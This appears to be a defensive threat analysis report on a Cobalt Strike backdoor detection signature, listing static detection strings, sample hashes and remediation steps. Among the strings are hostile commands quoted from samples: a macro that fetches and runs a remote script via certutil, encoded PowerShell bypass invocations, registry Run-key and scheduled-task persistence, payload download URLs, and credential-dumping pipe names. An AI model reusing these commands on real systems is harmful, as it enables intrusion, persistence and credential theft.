$ analyze-threat Backdoor:Win64/CobaltStrike!pz
Backdoor:Win64/CobaltStrike!pz - Windows Defender threat signature analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Backdoor:Win64/CobaltStrike!pz
Classification:
  Type: Backdoor
  Platform: Win64
  Family: CobaltStrike
  Detection Type: Concrete (known malware family with identified signatures)
  Suffix: !pz (packed or compressed to evade detection)
  Confidence: Very High
  False-Positive Risk: Low

Concrete signature match: Backdoor (provides unauthorized remote access) on the 64-bit Windows platform, family CobaltStrike

Summary:

This detection identifies a Cobalt Strike Beacon, a potent post-exploitation framework used by advanced threat actors. The threat establishes persistence via scheduled tasks and provides the attacker with full remote control to execute commands, steal data, and move laterally within the network.

Severity: Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - \cobaltstrike 3.14\payload\AvByPass (PEHSTR_EXT)
 - S/F /Create /TN Tencentid /sc minute /MO 1 /TR C:\Users\Public\Music\tencentsoso.exe (PEHSTR)
 - C:\Users\Public\Music\cia.plan (PEHSTR)
 - !C:\Users\Public\Music\SideBar.dll (PEHSTR)
 - artifact64big.dll (PEHSTR_EXT)
 - artifact32big.dll (PEHSTR_EXT)
 - K[ZKK\OKM (PEHSTR_EXT)
 - GetCommandLineA (PEHSTR_EXT)
 - GetCommandLineW (PEHSTR_EXT)
 - \\.\pipe\MSSE-1966-server (PEHSTR_EXT)
 - temp.dll (PEHSTR_EXT)
 - ././., (PEHSTR_EXT)
 - .,./., (PEHSTR_EXT)
 - /posts/ (PEHSTR_EXT)
 - /ivc/ (PEHSTR_EXT)
 - /k&>}2 (SNID)
 - vN.6b (SNID)
 - Microsoft Base Cryptographic Provider v1.0 (PEHSTR_EXT)
 - HttpAddRequestHeadersA (PEHSTR_EXT)
 - beacon.dll (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - \\.\pipe\bypassuac (PEHSTR_EXT)
 - \\.\pipe\keylogger (PEHSTR_EXT)
 - /send%s (PEHSTR_EXT)
 - rcap:// (PEHSTR_EXT)
 - \\.\pipe\netview (PEHSTR_EXT)
 - \\.\pipe\powershell (PEHSTR_EXT)
 - \\.\pipe\screenshot (PEHSTR_EXT)
 - \\.\pipe\elevate (PEHSTR_EXT)
 - \\.\pipe\hashdump (PEHSTR_EXT)
 - Global\SAM (PEHSTR_EXT)
 - \\.\pipe\portscan (PEHSTR_EXT)
 - \\%s\ipc$ (PEHSTR_EXT)
 - \\.\pipe\sshagent (PEHSTR_EXT)
 - COBALTSTRIKE (PEHSTR_EXT)
 - %1024[^ ] %8[^:]://%1016[^/]%7168 (PEHSTR_EXT)
 - \\%s\pipe\msagent_%x (PEHSTR_EXT)
 - [command] (PEHSTR_EXT)
 - \\.\pipe\mimikatz (PEHSTR_EXT)
 - test.dll (PEHSTR_EXT)
 - shellcodeexecute (PEHSTR_EXT)
 - Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
 - CWEMRvwtJNovrrWsIwERjSjD (PEHSTR_EXT)
 - github.com/mitre/gocat/ (PEHSTR_EXT)
 - AS\e\%r (SNID)
 - could not run command (w/ token) because of its length of %d bytes! (PEHSTR_EXT)
 - powershell -nop -exec bypass -EncodedCommand "%s" (PEHSTR_EXT)
 - spawn::decrypting... (PEHSTR)
 - \regedit.exe (PEHSTR)
 - tps://122.228.7.225/admin?file= (PEHSTR_EXT)
 - 122.193.130.74 (PEHSTR_EXT)
 - 121.207.229.145 (PEHSTR_EXT)
 - File Download Success. (PEHSTR_EXT)
 - download.exe (PEHSTR_EXT)
 - /checker (PEHSTR_EXT)
 - YG@JG\ (PEHSTR_EXT)
 - |ZB{]K\zF\KOJ}ZO\Z (PEHSTR_EXT)
 - HTTP/1.1 200 OK (PEHSTR_EXT)
 - %02d/%02d/%02d %02d:%02d:%02d (PEHSTR_EXT)
 - CFy92ROzKls\ro\HwtAF.pdb (PEHSTR_EXT)
 - r8BsHuPe56l\ilYp\i12tW5S7m3 (PEHSTR_EXT)
 - /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v  (PEHSTR_EXT)
 -  /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_ (PEHSTR_EXT)
 - 7I.S_T (SNID)
 - \.\pipe\Vmware.0000000000.0002 (PEHSTR_EXT)
 - 127.0.0.1 (PEHSTR_EXT)
 - gigabigsvc.dll (PEHSTR_EXT)
 - cmd.exe (PEHSTR_EXT)
 - \>~gZ (SNID)
 - shellcodeloading/checkSandbox.timeSleep (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.physicalMemory (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.numberOfCPU (PEHSTR_EXT)
 - sync.(*Mutex).Lock (PEHSTR_EXT)
 - crypto/cipher.xorBytes (PEHSTR_EXT)
 - shellcodeloading/aes.AesDecrypt (PEHSTR_EXT)
 - runtime.injectglist (PEHSTR_EXT)
 - sync.(*Mutex).lockSlow (PEHSTR_EXT)
 - sync.(*entry).load (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.CheckSandbox (PEHSTR_EXT)
 - crypto/cipher.NewCBCDecrypter (PEHSTR_EXT)
 - crypto/cipher.xorBytesSSE2 (PEHSTR_EXT)
 - crypto/aes.decryptBlockGo (PEHSTR_EXT)
 - 0.bin (PEHSTR_EXT)
 - \Bypass_AV.pdb (PEHSTR_EXT)
 - Bypass_AV.pdb (PEHSTR_EXT)
 - InternetReadFile(...) (PEHSTR_EXT)
 - HttpSendRequestA(...) (PEHSTR_EXT)
 - /htEp (PEHSTR_EXT)
 - oshi.at (PEHSTR_EXT)
 - UserInitMprLogonScript (PEHSTR_EXT)
 - notepad.exe (PEHSTR_EXT)
 - %s as %s\%s: %d (PEHSTR_EXT)
 - beacon.x64.dll (PEHSTR_EXT)
 - Updater.dll (PEHSTR_EXT)
 - Content-Type: application/octet-stream (PEHSTR_EXT)
 - DllMain (PEHSTR_EXT)
 - DllRegisterServer (PEHSTR_EXT)
 - hovitdz.dll (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%ckirito\asuna (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cwarcraft\dota (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cralka\ribak (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cmark\dabollo (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cpapizor\gojo (PEHSTR_EXT)
 - cmd /c C:\Windows\Temp (PEHSTR_EXT)
 - DllGetClassObject (PEHSTR_EXT)
 - executeShellcode (PEHSTR_EXT)
 - \SLN\HRM_SUB\ (PEHSTR_EXT)
 -  \HRM_SUB.pdb (PEHSTR_EXT)
 - AVBypass.pdb (PEHSTR_EXT)
 - http_dll.dat (PEHSTR_EXT)
 - weeulsf763bs1.dll (PEHSTR_EXT)
 - //rs.qbox.me/chtype/ (PEHSTR_EXT)
 - Dbak/chdb:qiniu.png (PEHSTR_EXT)
 - 252.72.131.228 (PEHSTR_EXT)
 - 240.232.200.0 (PEHSTR_EXT)
 - 0.0.65.81 (PEHSTR_EXT)
 - 65.80.82.81 (PEHSTR_EXT)
 - 86.72.49.210 (PEHSTR_EXT)
 - 101.72.139.82 (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - Aborting... (PEHSTR_EXT)
 - -sta -noprofile -executionpolicy bypass -encodedcommand (PEHSTR_EXT)
 - Press any key... (PEHSTR_EXT)
 - http://144.48.240.85/18.exe (PEHSTR_EXT)
 - 4Bejz8txQ/rDnf (PEHSTR_EXT)
 - ShellCodeLoader\bin (PEHSTR_EXT)
 - http://49.234.65.52/UpdateStream_x86.cab (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - \x91\xe1\xa19 (PEHSTR_EXT)
 - \xE9\xE8\Xa1 (PEHSTR_EXT)
 - 0ZNA3EZ4g.exe (PEHSTR_EXT)
 - 0ZNA3EZ4g.xlsx (PEHSTR_EXT)
 - legacy.chunk.js (PEHSTR_EXT)
 - windows\temp\ (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - getparagraphopendllpathforbinaryas1put1bclose1 (MACROHSTR_EXT)
 - namefnzstasstatbase64decodexe1py3jvc29mdfxuzwftc1xjdxjyzw50etdsendifend (MACROHSTR_EXT)
 - [i] Injecting The Reflective DLL Into (PEHSTR_EXT)
 - RlfDllInjector.pdb (PEHSTR_EXT)
 - windows.ini (PEHSTR)
 - mgur730yw1.dll (PEHSTR_EXT)
 - \Parallel_Asis.dll (PEHSTR_EXT)
 - mscorsvc.dll (PEHSTR_EXT)
 - 1.dll (PEHSTR_EXT)
 - Loader.nim (PEHSTR_EXT)
 - bcmode.nim (PEHSTR_EXT)
 - Test.dll (PEHSTR_EXT)
 - \.\PhysicalDrive0 (PEHSTR_EXT)
 - temp\packed64-temp.pdb (PEHSTR_EXT)
 - \projects\garda\storage\targets\work6.x2.pdb (PEHSTR_EXT)
 - .sedata (PEHSTR_EXT)
 - .gehc (PEHSTR_EXT)
 - Release\movenpeak.pdb (PEHSTR_EXT)
 - System.Web.ni.dll (PEHSTR_EXT)
 - 0cobaltstrike-chtsec (PEHSTR_EXT)
 - ({y#y/ (SNID)
 - DetectAttack.dll (PEHSTR_EXT)
 - x64\Debug\DetectAttack.pdb (PEHSTR_EXT)
 - powershell -nop -exec bypass -EncodedCommand (PEHSTR_EXT)
 - nfvurg856lk63.dll (PEHSTR_EXT)
 - programdata\3bef479.tmp (PEHSTR_EXT)
 - Release\SetupEngine.pdb (PEHSTR_EXT)
 - Applebaidugooglebingcsdnbokeyuanhelloworld.com (PEHSTR_EXT)
 - ;\$ r (PEHSTR_EXT)
 - PolicyPlus.Resources.resources (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cnetsvc\ (PEHSTR_EXT)
 - enhanced-google.com (PEHSTR_EXT)
 - Control_RunDLL "C:\ProgramData\AxlnstSV\xlsrd.cpl (PEHSTR_EXT)
 - E2/L9L$@ (PEHSTR_EXT)
 - CymulateStagelessMeterpreterDll.dll (PEHSTR_EXT)
 - \Cymulate\Agent\AttacksLogs\edr (PEHSTR_EXT)
 - Memory permissions changed successfully: PAGE_EXECUTE (PEHSTR_EXT)
 - QlZylT5WMZcGIAyTUbSGnAerR.resources (PEHSTR_EXT)
 - New Project 2.exe (PEHSTR_EXT)
 - raw.githubusercontent.com/kk-echo123/aoisndoi/ (PEHSTR_EXT)
 - .retplne (PEHSTR_EXT)
 - wsc_UUIDS.dll (PEHSTR_EXT)
 - D:\project\doge-cloud\targetfiles (PEHSTR_EXT)
 - on_avast_dll_unload (PEHSTR_EXT)
 - main.AesDecrypt (PEHSTR_EXT)
 - peloader\peloader_64\ (PEHSTR_EXT)
 - \Release\peloader (PEHSTR_EXT)
 - StartDllLoadData (PEHSTR_EXT)
 - vscodeWorkSpace\shellcode\whiteandblack (PEHSTR_EXT)
 - AvastSvc.exe (PEHSTR_EXT)
 - kpm_tray.exe (PEHSTR_EXT)
 - AtomLdr.dll (PEHSTR_EXT)
 - A7d8Gw8XN////76uvq+trqm3zi2at3Stn7d0ree3dK3ft3SNr7fwSLW1ss42t84/U (PEHSTR_EXT)
 - RunScript (PEHSTR_EXT)
 - PoolAndSpaDepot.My.Resources (PEHSTR_EXT)
 - test1\source\repos\download\x64\Release\download.pdb (PEHSTR_EXT)
 - \SudSolver.pdb (PEHSTR_EXT)
 - jsporvjlfsqmlsamxdrvitxha (PEHSTR_EXT)
 - api.gogleapi.click/file/System/ (PEHSTR_EXT)
 - Projects\evasionC_go\workingSpace (PEHSTR_EXT)
 - _seh_filter_dll (PEHSTR_EXT)
 - BoevVBacejSmwcZ (PEHSTR_EXT)
 - \Shellcode\ReflectiveLoader.pdb (PEHSTR_EXT)
 - /|bD;X (SNID)
 - MACOSX\pdf.pdf (PEHSTR_EXT)
 - sync.(*RHe0UcdpHEv).RUnlock (PEHSTR_EXT)
 - nX0mgbuOjw.(*wU6_Xfv4).bqwSOvr5m (PEHSTR_EXT)
 - yCcdI7eVq.(*UE5TRl).xKFXpU5Cyab (PEHSTR_EXT)
 - PT2MtVR9gr5.go (PEHSTR_EXT)
 - CallDLLDynamic.pdb (PEHSTR_EXT)
 - per_thread_data.cpp (PEHSTR_EXT)
 - [*] Executing (PEHSTR_EXT)
 - ConsoleApp1.exe (PEHSTR_EXT)
 - n/q9) (SNID)
 - ,!B2,/H;t$ (PEHSTR_EXT)
 - krpt_RemoveDllFilterProtectDetour (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - GEMS\GEMS\obj\Release\GEMS.pdb (PEHSTR_EXT)
 - Users\Apocalypse\ (PEHSTR_EXT)
 - \Rust\client\1.pdb (PEHSTR_EXT)
 - 57k7w2hd52.8pfyh.ws:8443/TseNn7 (PEHSTR_EXT)
 - quiomnissitaliquidmolestias24.dll (PEHSTR_EXT)
 - xxxx.dll (PEHSTR_EXT)
 - DllUnregisterServer (PEHSTR_EXT)
 - /Mark\NewVirus\CPP\msedge\x64\Release\msedge.pdb (PEHSTR)
 - msedge.dll (PEHSTR)
 - http://www.flntp.ro/fintp.x64.bin (PEHSTR_EXT)
 - ConsoleApplication6.pdb (PEHSTR_EXT)
 - systeminfo.txt (PEHSTR_EXT)
 - dfbfdhbfddfbfdnhdfhfd.fll (PEHSTR_EXT)
 - D$.2D$FC (PEHSTR_EXT)
 - D$/2D$GC (PEHSTR_EXT)
 - C:\Users\Public (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - NewWYDll\NewWYDll\Release\NewWYDll.pdb (PEHSTR_EXT)
 - %s\updater.exe (PEHSTR_EXT)
 - %s\libcurl.dll (PEHSTR_EXT)
 - cobalt-strike-master\x64\Release\msedge.pdb (PEHSTR_EXT)
 - \Windows\CurrentVersion\Run (PEHSTR_EXT)
 - \mfehcs.exe (PEHSTR_EXT)
 - cmd /c taskkill /F /PID (PEHSTR_EXT)
 - \MyNewDLL\x64\Release\pdh.pdb (PEHSTR_EXT)
 - libEGL.dll.pdb (PEHSTR_EXT)
 - kapitalbankaz.azurewebsites.net/api/getit (PEHSTR_EXT)
 - InternetExplorer.pdb (PEHSTR_EXT)
 - http://149.28.222.244:8000/ (PEHSTR_EXT)
 - Shellcode decryption complete. (PEHSTR_EXT)
 - f574d29994a3adc68dcbd2a39596331713957734.bin.packed.dll (PEHSTR_EXT)
 - Wininet. (PEHSTR_EXT)
 - dll (PEHSTR_EXT)
 - Press <Enter> To Execute The Payload ... (PEHSTR_EXT)
 - \SophosUninstall.p (PEHSTR_EXT)
 - SophosFS.p (PEHSTR_EXT)
 - SophosNtpUninstall.p (PEHSTR_EXT)
 - SophosFSTelemetry.p (PEHSTR_EXT)
 - /CPNGXa3g1gm8hD3zsdW (PEHSTR_EXT)
 - lease\Project5.pdb (PEHSTR_EXT)
 - minimaaccusamusnihilvoluptaset90.dll (PEHSTR_EXT)
 - Decrypted %d... (%d %%) i = %d; full_length = %d (PEHSTR_EXT)
 - Decrypted %d...ok! (PEHSTR_EXT)
 - *,d:/th/ds/ext/aad (PEHSTR_EXT)
 - NLc0MDg9zP6VTvRMbffF0O23WgXbBZBl3PO9/14+ABQ= (PEHSTR_EXT)
 - atks.exe (PEHSTR_EXT)
 - ://0x1.social (PEHSTR_EXT)
 - 47.92.131.203 (PEHSTR_EXT)
 - Windows.pdb (PEHSTR_EXT)
 - .C0D. (PEHSTR_EXT)
 - main.xorDecrypt (PEHSTR_EXT)
 - main.AesDecryptCFB (PEHSTR_EXT)
 - main.refun (PEHSTR_EXT)
 - main.run (PEHSTR_EXT)
 - d20%:d20%:d20% d20%/d20%/d20% (PEHSTR)
 - 0% d20%/d20%/d20 (PEHSTR)
 - g('http://47.106.67.138:80/a')) (PEHSTR_EXT)
 - System.Management.Automation.AmsiUtils (PEHSTR_EXT)
 - main.AesDecryptByECB (PEHSTR_EXT)
 - main.PKCS7UNPadding (PEHSTR_EXT)
 - main.closeWindows (PEHSTR_EXT)
 - runtime.sysReserve (PEHSTR_EXT)
 - runtime.badctxt (PEHSTR_EXT)
 - runtime.allgadd (PEHSTR_EXT)
 - runtime.traceShuttingDown (PEHSTR_EXT)
 - runtime.traceLocker.GoSched (PEHSTR_EXT)
 - \$0E3 (PEHSTR)
 - lease\x64\overseer.pdb (PEHSTR_EXT)
 - axy1/TpcPcZwBtQYcCL6rREEc/8XLJ (PEHSTR_EXT)
 - maskdesk.info (PEHSTR_EXT)
 - /file (PEHSTR_EXT)
 - System32\notepad.exe (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - almounah/go-buena-clr (PEHSTR_EXT)
 - chrome_decrypt.log (PEHSTR_EXT)
 - Windows\CurrentVersion\Run (PEHSTR_EXT)
 - f_u_c_k...... (PEHSTR_EXT)
 - Ran CobaltStrike (PEHSTR_EXT)
 - ReverseShell_%s_%s.exe (PEHSTR_EXT)
 - aLdbcGgcd@hdf;iff9igf5jgg/khg)khg (PEHSTR_EXT)
 - bWebdRgceNhdfHjehAjfh<lhi9lij6mij/njk(njk (PEHSTR_EXT)
 - fbdXhdeSiegOjfhGlhiAmij<mik9okl5okl.plm'qll!rnn (PEHSTR_EXT)
 - alfccahdfZjfhUkgjOmijHnklBqmm>qmn:rno6soo.sop'tpp!wsr (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware samples associated with this threat:
  Filename: 0be5b92bd1e8acef055ef1f1de67aef5.exe
  SHA-256:  5a5c149b165ec4d6366c2ffdf1c9bfc2138577cb5b058ee852bdf4c6d978fd06
  Date:     07/12/2025

  Filename: stagedx64.exe
  SHA-256:  5fc803d3a97caa8c482a4e69cdc513e72a2c8c8eac47329c481b1da792deab46
  Date:     07/12/2025

  Filename: RD.exe
  SHA-256:  6f0c0284719b3d4eb15f796f04d806171118fa5c4b42e5cb38433c68d6f919ec
  Date:     06/12/2025

  Filename: RD.exe
  SHA-256:  f5c7faca5b5563e4740a6d2196acfb3626ecbcd38da4d690dc23e13e7ecf747c
  Date:     05/12/2025
Remediation Steps:
Immediately isolate the affected machine from the network to prevent lateral movement. Investigate the scope of the compromise, as other systems are likely affected. Remove identified malicious files and persistence mechanisms, reset all credentials on the system, and re-image the device from a known-good source.
=== END REPORT ===
This analysis was last updated on 05/12/2025.